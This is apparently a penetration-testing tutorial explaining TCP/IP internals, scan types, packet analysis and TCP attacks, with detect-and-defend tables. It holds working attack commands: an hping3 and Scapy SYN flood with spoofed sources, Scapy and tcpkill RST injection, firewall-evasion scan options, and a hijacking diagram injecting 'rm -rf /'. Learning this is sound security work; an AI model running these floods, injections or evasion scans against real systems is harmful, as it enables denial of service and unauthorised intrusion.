TCP/IP Deep Dive for Pentesters
TL;DR: TCP provides reliable, ordered data delivery over IP. Understanding TCP internals (flags, sequence numbers, states) is essential for scanning, session hijacking, firewall evasion, and network attacks.
Table of Contents
Open Table of Contents
Quick Reference
TCP Flags
| Flag | Name | Binary | Use |
|---|
| SYN | Synchronize | 0x02 | Initiate connection |
| ACK | Acknowledgment | 0x10 | Confirm receipt |
| FIN | Finish | 0x01 | Close connection |
| RST | Reset | 0x04 | Abort connection |
| PSH | Push | 0x08 | Send immediately |
| URG | Urgent | 0x20 | Urgent data |
| ECE | ECN-Echo | 0x40 | Congestion notification |
| CWR | Congestion Window Reduced | 0x80 | Response to ECE |
Essential Commands
| Command | Purpose | Example |
|---|
tcpdump | Capture packets | tcpdump -i eth0 tcp |
wireshark | GUI packet analysis | wireshark |
nmap | Port scanning | nmap -sS target |
hping3 | Packet crafting | hping3 -S target -p 80 |
netcat | TCP connections | nc -v target 80 |
ss | Socket statistics | ss -tuln |
Common TCP Ports
| Port | Service | Notes |
|---|
| 20/21 | FTP | File transfer |
| 22 | SSH | Secure shell |
| 23 | Telnet | Unencrypted |
| 25 | SMTP | Email |
| 80 | HTTP | Web |
| 443 | HTTPS | Encrypted web |
| 445 | SMB | File sharing |
| 3389 | RDP | Remote desktop |
Why TCP Matters for Pentesters
TCP Knowledge Enables
| Capability | How TCP Knowledge Helps |
|---|
| Port Scanning | Understand scan types (SYN, Connect, FIN) |
| Session Hijacking | Predict sequence numbers |
| DoS Attacks | SYN floods, RST attacks |
| Firewall Evasion | Fragment packets, unusual flags |
| IDS Evasion | Overlapping fragments, TTL tricks |
| Packet Analysis | Identify anomalies in captures |
Real-World TCP Attacks
| Attack | Technique | Impact |
|---|
| Mitnick Attack (1994) | TCP sequence prediction | System compromise |
| SYN Flood | Resource exhaustion | DoS |
| BGP Hijacking | TCP session injection | Traffic interception |
| Off-path attacks | Blind TCP injection | Connection reset |
TCP vs UDP
TL;DR: TCP = reliable, ordered, connection-oriented. UDP = fast, no guarantees, connectionless.
Comparison
| Feature | TCP | UDP |
|---|
| Connection | Connection-oriented | Connectionless |
| Reliability | Guaranteed delivery | Best effort |
| Ordering | Maintains order | No ordering |
| Error checking | Yes (retransmission) | Basic (checksum) |
| Flow control | Yes (window) | No |
| Speed | Slower | Faster |
| Header size | 20-60 bytes | 8 bytes |
| Use cases | HTTP, SSH, FTP | DNS, DHCP, VoIP |
When Each Is Used
TCP (Reliable):
├── Web browsing (HTTP/HTTPS)
├── Email (SMTP, IMAP, POP3)
├── File transfer (FTP, SFTP)
├── Remote access (SSH, RDP)
└── Database connections
UDP (Fast):
├── DNS queries
├── DHCP
├── Video streaming
├── VoIP
├── Gaming
└── NTP
TL;DR: The TCP header contains all control information: ports, sequence numbers, flags, window size, and checksums.
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |C|E|U|A|P|R|S|F| |
| Offset| Rsrvd |W|C|R|C|S|S|Y|I| Window |
| | |R|E|G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options (if Data Offset > 5) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Field | Size | Purpose | Pentester Interest |
|---|
| Source Port | 16 bits | Sender’s port | Identify application |
| Dest Port | 16 bits | Receiver’s port | Target service |
| Sequence # | 32 bits | Byte position | Session hijacking |
| Ack # | 32 bits | Next expected byte | Session hijacking |
| Data Offset | 4 bits | Header length | Options detection |
| Flags | 8 bits | Control flags | Scan types, attacks |
| Window | 16 bits | Buffer size | Flow control abuse |
| Checksum | 16 bits | Error detection | Bypass with crafted packets |
| Urgent Ptr | 16 bits | Urgent data location | Rarely used |
| Options | Variable | MSS, timestamps, etc. | Fingerprinting |
TCP Flags Explained
TL;DR: TCP flags control the state and behavior of connections. Understanding flags is crucial for scanning and attacks.
Flag Details
┌───────────────────────────────────────────────────────────────┐
│ TCP Flags │
├─────────┬───────────────────────────────────────────────────────┤
│ SYN │ "I want to start a connection" │
│ │ Sets initial sequence number │
│ │ Only in first packet of handshake │
├─────────┼───────────────────────────────────────────────────────┤
│ ACK │ "I acknowledge your data" │
│ │ Present in all packets after SYN │
│ │ Acknowledgment number is valid │
├─────────┼───────────────────────────────────────────────────────┤
│ FIN │ "I'm done sending" │
│ │ Graceful connection close │
│ │ Still receives data until other side FINs │
├─────────┼───────────────────────────────────────────────────────┤
│ RST │ "Something is wrong, abort immediately" │
│ │ No graceful close │
│ │ No further communication │
├─────────┼───────────────────────────────────────────────────────┤
│ PSH │ "Send this data immediately" │
│ │ Don't wait for buffer to fill │
│ │ Application wants data now │
├─────────┼───────────────────────────────────────────────────────┤
│ URG │ "There's urgent data" │
│ │ Urgent pointer is valid │
│ │ Rarely used in practice │
└─────────┴───────────────────────────────────────────────────────┘
Common Flag Combinations
| Flags | Name | Purpose |
|---|
| SYN | SYN packet | Connection request |
| SYN+ACK | SYN-ACK | Connection accepted |
| ACK | ACK packet | Normal data transfer |
| FIN+ACK | FIN-ACK | Close request |
| RST | Reset | Abort connection |
| RST+ACK | Reset-ACK | Reject connection |
| PSH+ACK | Push-ACK | Immediate data delivery |
| (none) | NULL | Scanning technique |
| FIN+PSH+URG | XMAS | Scanning technique |
Flags in Wireshark Display Filter
# Filter by specific flags
tcp.flags.syn == 1
tcp.flags.ack == 1
tcp.flags.fin == 1
tcp.flags.reset == 1
# SYN packets only (no ACK)
tcp.flags.syn == 1 && tcp.flags.ack == 0
# RST packets
tcp.flags.reset == 1
# XMAS scan packets
tcp.flags.fin == 1 && tcp.flags.push == 1 && tcp.flags.urg == 1
The Three-Way Handshake
TL;DR: TCP connections start with SYN → SYN-ACK → ACK. Understanding this is fundamental for scanning and attacks.
Handshake Process
Client Server
│ │
│ │
│ ─────────────── SYN ──────────────────────► │
│ Seq=100, Ack=0, Flags=SYN │
│ "I want to connect" │
│ │
│ ◄─────────── SYN-ACK ───────────────────── │
│ Seq=300, Ack=101, Flags=SYN+ACK │
│ "OK, I acknowledge. Here's my seq#" │
│ │
│ ─────────────── ACK ──────────────────────► │
│ Seq=101, Ack=301, Flags=ACK │
│ "Connection established" │
│ │
│ ═══════════ DATA TRANSFER ═════════════════ │
│ │
Sequence Number Evolution
Step 1 - Client SYN:
Client Seq = 100 (random initial)
Step 2 - Server SYN-ACK:
Server Seq = 300 (random initial)
Server Ack = 101 (Client Seq + 1)
Step 3 - Client ACK:
Client Seq = 101 (unchanged)
Client Ack = 301 (Server Seq + 1)
Connection Established:
Client → Server: Seq starts at 101
Server → Client: Seq starts at 301
Why Random Sequence Numbers?
| Reason | Explanation |
|---|
| Security | Prevent sequence prediction attacks |
| Uniqueness | Avoid confusion with old connections |
| Hijacking prevention | Attacker can’t guess sequence |
Historical vulnerability: Before random ISNs, attackers could predict sequence numbers (Mitnick attack, 1994).
Sequence and Acknowledgment Numbers
TL;DR: Sequence numbers track bytes sent. Acknowledgment numbers confirm bytes received. Both are essential for session hijacking.
How They Work
Example data transfer:
Client sends 100 bytes:
Seq=1000, Data=100 bytes
"Here are bytes 1000-1099"
Server acknowledges:
Ack=1100
"I received up to byte 1099, send 1100 next"
Client sends 50 more bytes:
Seq=1100, Data=50 bytes
"Here are bytes 1100-1149"
Server acknowledges:
Ack=1150
"I received up to byte 1149, send 1150 next"
Visualized
┌──────────────────────────────────────┐
│ Byte Stream │
└──────────────────────────────────────┘
Byte: 1000 1050 1100 1150 1200 1250 1300
│ │ │ │ │ │ │
│◄──Sent──►│◄──Sent──►│◄─Pending─►│
│ Packet1 │ Packet2 │ Not sent │
│ │ │ │
Seq=1000 Seq=1100
Len=100 Len=50
│ │
└─── Ack=1100 (acknowledges Packet1)
│
└─── Ack=1150 (acknowledges Packet2)
Pentester Use: Session Hijacking
To inject packets into an existing TCP session:
- Sniff the connection to observe current Seq/Ack
- Craft packet with correct Seq number
- Send before legitimate packet arrives
| Attack | Detect | Defend |
|---|
| Sequence prediction | Monitor for blind injections | Random ISNs |
| Session hijacking | Detect duplicate Acks | Encrypted sessions (TLS) |
| RST injection | Track connection states | TCP timestamps |
TCP Connection States
TL;DR: TCP connections move through states (LISTEN, ESTABLISHED, etc.). Understanding states helps identify connection issues and attack opportunities.
State Diagram
┌─────────────┐
│ CLOSED │
└──────┬──────┘
│
┌─────────────────────────┴─────────────────────────┐
│ Passive Open Active Open │
│ (Server) (Client) │
▼ ▼
┌─────────────┐ ┌─────────────┐
│ LISTEN │ │ SYN_SENT │
└──────┬──────┘ └──────┬──────┘
│ Receive SYN │
│ Send SYN-ACK │ Receive SYN-ACK
▼ │ Send ACK
┌─────────────┐ │
│ SYN_RCVD │──────────────────────────────────────────►│
└──────┬──────┘ Receive ACK │
│ │
└───────────────────────┬───────────────────────────┘
│
▼
┌─────────────┐
│ ESTABLISHED │ ← Data Transfer
└──────┬──────┘
│
┌────────────────────┴────────────────────┐
│ Close │ Receive FIN
│ (Active Close) │ (Passive Close)
▼ ▼
┌─────────────┐ ┌─────────────┐
│ FIN_WAIT_1 │ │ CLOSE_WAIT │
└──────┬──────┘ └──────┬──────┘
│ Receive ACK │ Close
▼ │ Send FIN
┌─────────────┐ ▼
│ FIN_WAIT_2 │ ┌─────────────┐
└──────┬──────┘ │ LAST_ACK │
│ Receive FIN └──────┬──────┘
│ Send ACK │ Receive ACK
▼ │
┌─────────────┐ │
│ TIME_WAIT │─────────────────────────────────┘
└──────┬──────┘
│ 2*MSL timeout
▼
┌─────────────┐
│ CLOSED │
└─────────────┘
Important States
| State | Meaning | Pentester Note |
|---|
| LISTEN | Server waiting for connections | Open port |
| SYN_SENT | Client sent SYN, awaiting SYN-ACK | Connect scan in progress |
| SYN_RCVD | Server received SYN | Half-open (SYN flood target) |
| ESTABLISHED | Connection active | Data transfer possible |
| FIN_WAIT_1/2 | Closing initiated | Connection ending |
| TIME_WAIT | Waiting for delayed packets | Port temporarily unavailable |
| CLOSE_WAIT | Remote closed, local still open | Possible resource leak |
Viewing Connection States
Commands
# Linux - ss (recommended)
ss -tuln # Listening sockets
ss -tuna # All connections
ss -tuna state established # Established only
ss -tuna state time-wait # TIME_WAIT sockets
# Linux - netstat (legacy)
netstat -tuln # Listening
netstat -tuna # All
# Windows
netstat -an
netstat -an | findstr ESTABLISHED
# Count connections by state
ss -tuna | awk '{print $1}' | sort | uniq -c
# Watch for changes
watch -n 1 'ss -tuna | grep ESTAB'
TCP Attacks
1. SYN Flood (DoS)
Send many SYN packets without completing handshake, exhausting server resources.
Attacker Victim Server
│ │
│ ─────────── SYN (src=spoofed1) ─────────────────► │ SYN_RCVD
│ ─────────── SYN (src=spoofed2) ─────────────────► │ SYN_RCVD
│ ─────────── SYN (src=spoofed3) ─────────────────► │ SYN_RCVD
│ ─────────── SYN (src=spoofed4) ─────────────────► │ SYN_RCVD
│ ... thousands more ... │
│ │
│ Server's SYN queue fills │
│ Legitimate connections │
│ are dropped │
| Attack | Detect | Defend |
|---|
| SYN flood | Monitor half-open connections | SYN cookies |
| Spoofed source IPs | Detect high SYN rate | Rate limiting |
| Distributed (DDoS) | Traffic anomaly detection | Anycast, CDN |
Testing Commands (Lab Only)
# Using hping3
hping3 -S --flood -V -p 80 target.com
# Using Scapy
python3 << 'EOF'
from scapy.all import *
target = "192.168.1.1"
for i in range(1000):
ip = IP(src=RandIP(), dst=target)
tcp = TCP(sport=RandShort(), dport=80, flags="S")
send(ip/tcp, verbose=0)
EOF
# Detection
ss -tuna state syn-recv | wc -l
netstat -an | grep SYN_RECV | wc -l
2. TCP Reset Attack
Inject RST packet to terminate legitimate connections.
Client Attacker Server
│ │ │
│◄════════ ESTABLISHED ════════════════════════════════►│
│ Seq=1000 │
│ │ │
│ │ Sniff: Current Seq ~1000 │
│ │ │
│ RST │ │
│◄─────────────────────────│ Seq=1000 (guessed) │
│ Flags=RST │ │
│ │ │
│ Connection terminated! │ │
| Attack | Detect | Defend |
|---|
| Inject RST | Monitor unexpected RSTs | Encrypted (TLS) |
| BGP reset attacks | Track connection drops | TCP-AO authentication |
| DoS via RST | Anomaly detection | Sequence validation |
Testing Commands (Lab Only)
# Using hping3
hping3 -R -s 12345 -p 80 -M 1000 target.com
# Using Scapy
python3 << 'EOF'
from scapy.all import *
# Sniff to get current sequence
# Then inject RST
ip = IP(dst="target", src="spoofed_client")
tcp = TCP(sport=client_port, dport=80, flags="R", seq=current_seq)
send(ip/tcp)
EOF
# Using tcpkill (requires sniffing)
tcpkill -i eth0 host target.com and port 80
3. Session Hijacking
Predict or sniff sequence numbers to inject data into active session.
Client Attacker Server
│ │ │
│◄════════ ESTABLISHED ════════════════════════════════►│
│ Seq=1000, Ack=5000 │
│ │ │
│ │ Sniff: Seq/Ack values │
│ │ │
│ │ ACK+PSH │
│ │────────────────────────────►│
│ │ Seq=1000, Ack=5000 │
│ │ Data="rm -rf /" │
│ │ │
│ │ Command executed│
| Attack | Detect | Defend |
|---|
| Blind hijacking | Monitor duplicate ACKs | Random ISN, TLS |
| MITM hijacking | Detect ARP spoofing | End-to-end encryption |
| Sequence prediction | Track connection anomalies | Modern OS (random ISN) |
4. TCP Connection Stealing
Desynchronize client-server sequence numbers, then inject traffic.
1. Attacker causes desynchronization
2. Client and server have different Seq/Ack expectations
3. Attacker bridges the gap
4. Attacker can inject/modify traffic
5. Denial of Service via Connection Exhaustion
Open many connections without sending data.
# Slowloris-style attack (keep connections open)
# Send partial HTTP requests, never complete them
# Each connection consumes server resources
| Attack | Detect | Defend |
|---|
| Slowloris | Monitor slow connections | Connection timeouts |
| Socket exhaustion | Track connection count | Connection limits |
| RUDY (slow POST) | Monitor request rates | Request timeouts |
Scanning with TCP
TL;DR: Different scan types use different TCP flags and behaviors to identify open ports.
Scan Types
| Scan | nmap Flag | How It Works | Stealthy? |
|---|
| SYN scan | -sS | SYN → SYN-ACK (open) or RST (closed) | Yes |
| Connect scan | -sT | Full 3-way handshake | No (logged) |
| FIN scan | -sF | FIN → no response (open) or RST (closed) | Yes |
| NULL scan | -sN | No flags → no response (open) or RST (closed) | Yes |
| XMAS scan | -sX | FIN+PSH+URG → no response (open) or RST | Yes |
| ACK scan | -sA | ACK → RST (unfiltered) or no response (filtered) | Firewall detection |
Scan Responses
SYN Scan:
Open Port: Closed Port:
┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐
│Scanner │ │ Target │ │Scanner │ │ Target │
└───┬────┘ └───┬────┘ └───┬────┘ └───┬────┘
│ │ │ │
│──── SYN ────►│ │──── SYN ────►│
│ │ │ │
│◄── SYN-ACK ──│ │◄──── RST ────│
│ │ │ │
│──── RST ────►│ Port is closed │
│ (Abort) │ │ │
FIN/NULL/XMAS Scan (RFC 793):
Open Port: Closed Port:
┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐
│Scanner │ │ Target │ │Scanner │ │ Target │
└───┬────┘ └───┬────┘ └───┬────┘ └───┬────┘
│ │ │ │
│── FIN/etc. ─►│ │── FIN/etc. ─►│
│ │ │ │
│ (silence) │ │◄──── RST ────│
│ │ │ │
│ Open or │ Port is closed │
│ Filtered │ │ │
Practical Scanning
Scan Commands
# === nmap Scans ===
# SYN scan (most common, requires root)
sudo nmap -sS -p 1-1000 target.com
# Connect scan (no root needed)
nmap -sT -p 1-1000 target.com
# FIN scan
sudo nmap -sF target.com
# NULL scan
sudo nmap -sN target.com
# XMAS scan
sudo nmap -sX target.com
# ACK scan (firewall detection)
sudo nmap -sA target.com
# Window scan (variation of ACK)
sudo nmap -sW target.com
# === hping3 Scans ===
# SYN scan
hping3 -S -p 80 target.com
# FIN scan
hping3 -F -p 80 target.com
# XMAS scan
hping3 -FPU -p 80 target.com
# NULL scan
hping3 -p 80 target.com
# === Scan timing ===
# Slow (IDS evasion)
nmap -sS -T1 target.com
# Fast
nmap -sS -T4 target.com
# Aggressive
nmap -sS -T5 target.com
Packet Analysis
TL;DR: Capturing and analyzing TCP packets reveals connection patterns, anomalies, and potential attacks.
Wireshark TCP Analysis
Wireshark TCP Dissection:
┌─────────────────────────────────────────────────────────────────┐
│ Frame 1: TCP SYN │
├─────────────────────────────────────────────────────────────────┤
│ Source Port: 54321 │
│ Destination Port: 80 │
│ Sequence Number: 1000 (relative: 0) │
│ Acknowledgment Number: 0 │
│ Flags: 0x002 (SYN) │
│ .... ..0. .... = No Ack │
│ .... ...0 .... = No Push │
│ .... .... 0... = No Reset │
│ .... .... .0.. = No Syn ... wait, 1! SYN │
│ Window: 65535 │
│ Options: MSS=1460, SACK permitted, Timestamps │
└─────────────────────────────────────────────────────────────────┘
Useful Wireshark Filters
| Filter | Purpose |
|---|
tcp | All TCP traffic |
tcp.port == 80 | HTTP traffic |
tcp.flags.syn == 1 | SYN packets |
tcp.flags.syn == 1 && tcp.flags.ack == 0 | Initial SYNs |
tcp.flags.reset == 1 | RST packets |
tcp.analysis.retransmission | Retransmissions |
tcp.analysis.duplicate_ack | Duplicate ACKs |
tcp.analysis.zero_window | Window full |
tcp.analysis.out_of_order | Out of order |
tcpdump for TCP
tcpdump Commands
# Capture TCP on port 80
tcpdump -i eth0 tcp port 80
# Capture SYN packets only
tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'
# Capture SYN but not SYN-ACK
tcpdump -i eth0 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'
# Capture RST packets
tcpdump -i eth0 'tcp[tcpflags] & tcp-rst != 0'
# Capture FIN packets
tcpdump -i eth0 'tcp[tcpflags] & tcp-fin != 0'
# Show TCP flags
tcpdump -i eth0 tcp -vv
# Save to file
tcpdump -i eth0 tcp -w capture.pcap
# Read from file
tcpdump -r capture.pcap
# Show hex dump
tcpdump -i eth0 tcp -X
# Filter by host
tcpdump -i eth0 tcp and host 192.168.1.1
# Filter by port range
tcpdump -i eth0 tcp portrange 20-25
Identifying Anomalies
| Anomaly | Indicator | Possible Cause |
|---|
| High retransmissions | tcp.analysis.retransmission | Network issues, attack |
| Many RST packets | tcp.flags.reset == 1 | Port scan, RST attack |
| Half-open connections | SYN without SYN-ACK | SYN flood |
| Unusual flags | FIN without prior handshake | FIN/NULL/XMAS scan |
| Large window size | Window > normal | Potential amplification |
| Out of order packets | Sequence gaps | Network issues or injection |
Firewall Evasion
TL;DR: Firewalls filter based on ports, flags, and states. Evasion techniques exploit parsing differences.
Evasion Techniques
| Technique | How It Works | Use |
|---|
| Fragment | Split packet across fragments | Bypass pattern matching |
| TTL manipulation | Packets reach target but not IDS | IDS in path |
| Bad checksum | Some systems ignore | Evade inspection |
| Unusual flags | FIN without connection | Bypass stateful FW |
| Source port | Use trusted ports (53, 80) | Bypass port filtering |
| Decoy | Multiple source IPs | Hide attacker IP |
Fragmentation
Normal Packet:
┌─────────────────────────────────────────┐
│ IP Header │ TCP Header │ Data │
└─────────────────────────────────────────┘
Fragmented:
┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐
│ IP │ Part of TCP│ │ IP │ Rest of TCP │ │ IP │ Data │
│ │ Header │ │ │ + Flags │ │ │ │
└─────────────────┘ └─────────────────┘ └─────────────────┘
Fragment 1 Fragment 2 Fragment 3
Firewall sees incomplete TCP header in Fragment 1
May not be able to apply TCP rules
Evasion Commands
# === nmap Evasion ===
# Fragment packets
nmap -f target.com
# MTU (Maximum Transmission Unit)
nmap --mtu 24 target.com
# Decoy scan
nmap -D RND:10 target.com
nmap -D decoy1,decoy2,ME target.com
# Source port manipulation
nmap --source-port 53 target.com
nmap -g 53 target.com
# Randomize host order
nmap --randomize-hosts 192.168.1.0/24
# Timing (slow down)
nmap -T0 target.com # Paranoid
nmap -T1 target.com # Sneaky
# Bad checksum (testing)
nmap --badsum target.com
# === hping3 Evasion ===
# Fragment
hping3 -S -f -p 80 target.com
# TTL manipulation
hping3 -S -t 5 -p 80 target.com
# Spoof source port
hping3 -S -s 53 -p 80 target.com
Packet Crafting
| Tool | Purpose | Install |
|---|
| hping3 | TCP/IP packet crafting | apt install hping3 |
| Scapy | Python packet manipulation | pip install scapy |
| nping | nmap’s packet generator | apt install nmap |
| nemesis | Command-line packet craft | apt install nemesis |
Packet Analysis
| Tool | Purpose | Install |
|---|
| Wireshark | GUI packet analyzer | apt install wireshark |
| tcpdump | CLI packet capture | apt install tcpdump |
| tshark | Wireshark CLI | apt install tshark |
| NetworkMiner | Forensic analyzer | Download |
| Tool | Purpose | Install |
|---|
| netcat (nc) | TCP/UDP connections | apt install netcat |
| ncat | Improved netcat | apt install nmap |
| socat | Advanced relay | apt install socat |
Practice Labs
Beginner
| Resource | Focus |
|---|
| TryHackMe - Network Fundamentals | TCP basics |
| HackTheBox Academy | Packet analysis |
| Wireshark tutorial | Tool usage |
| Resource | Focus |
|---|
| PentesterLab | TCP attacks |
| CTF challenges | Packet forensics |
| Home lab | Attack simulation |
Home Lab Setup
# Set up packet capture environment
# 1. Install tools
apt install wireshark tcpdump nmap hping3 netcat
# 2. Create test environment with two VMs
# VM1: Target (open services)
# VM2: Attacker
# 3. Practice exercises:
# - Capture three-way handshake
# - Identify scan types in captures
# - Perform SYN scan and capture
# - Analyze retransmissions
# Sample capture exercise:
# Terminal 1: Start capture
tcpdump -i eth0 -w capture.pcap tcp port 80
# Terminal 2: Generate traffic
curl http://target.com
# Terminal 3: Analyze
wireshark capture.pcap
Glossary
| Term | Definition |
|---|
| ACK | Acknowledgment flag |
| Checksum | Error detection value |
| FIN | Finish flag (close connection) |
| Handshake | Connection establishment |
| ISN | Initial Sequence Number |
| MSS | Maximum Segment Size |
| PSH | Push flag (immediate delivery) |
| RST | Reset flag (abort) |
| RTT | Round Trip Time |
| Segment | TCP data unit |
| SEQ | Sequence number |
| SYN | Synchronize flag (initiate) |
| SYN-ACK | SYN + ACK (accept connection) |
| TTL | Time To Live |
| URG | Urgent flag |
| Window | Flow control buffer size |
What’s Next?
Now that you understand TCP/IP:
| Topic | Description | Link |
|---|
| ARP & Layer 2 | Link layer attacks | Coming Soon |
| Network Fundamentals | Broader networking | Network Fundamentals |
| DNS Deep Dive | Application layer | DNS Guide |
| Wireshark Mastery | Deep packet analysis | Practice Labs |
Summary
TCP/IP knowledge is fundamental for penetration testing:
- TCP Header - Ports, sequence numbers, flags, window
- Three-Way Handshake - SYN → SYN-ACK → ACK
- Flags - SYN, ACK, FIN, RST, PSH, URG
- Attacks - SYN flood, RST injection, session hijacking
- Scanning - SYN, Connect, FIN, NULL, XMAS, ACK
- Analysis - Wireshark, tcpdump, identifying anomalies
- Evasion - Fragmentation, timing, source port, decoys
Key Skills:
- Read and understand packet captures
- Identify open ports using different scan types
- Recognize attack patterns in traffic
- Craft custom packets for testing
Found this guide helpful? Check out the other posts in the SecureKhan penetration testing series.